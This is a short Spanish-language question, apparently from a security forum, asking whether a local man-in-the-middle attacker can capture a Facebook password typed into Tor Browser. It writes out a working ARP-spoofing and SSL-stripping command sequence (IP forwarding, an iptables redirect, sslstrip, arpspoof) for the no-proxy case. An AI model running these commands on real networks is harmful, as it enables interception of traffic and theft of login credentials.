¿Tengo que temer a un atacante local de "hombre en medio" al ingresar la contraseña con tor?
Supongamos que una víctima se está conectando a Facebook con tor Browser.
¿Cómo construiría un atacante un ataque de hombre en el medio que obtenga su contraseña? (qué comandos precisos)
Si no se usa un proxy, el atacante usaría
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 54321
sslstrip -l 54321
arpspoof -i eth0 -t < targetIP > < gatewayIP >
arpspoof -i eth0 -t < gatewayIP > < targetIP>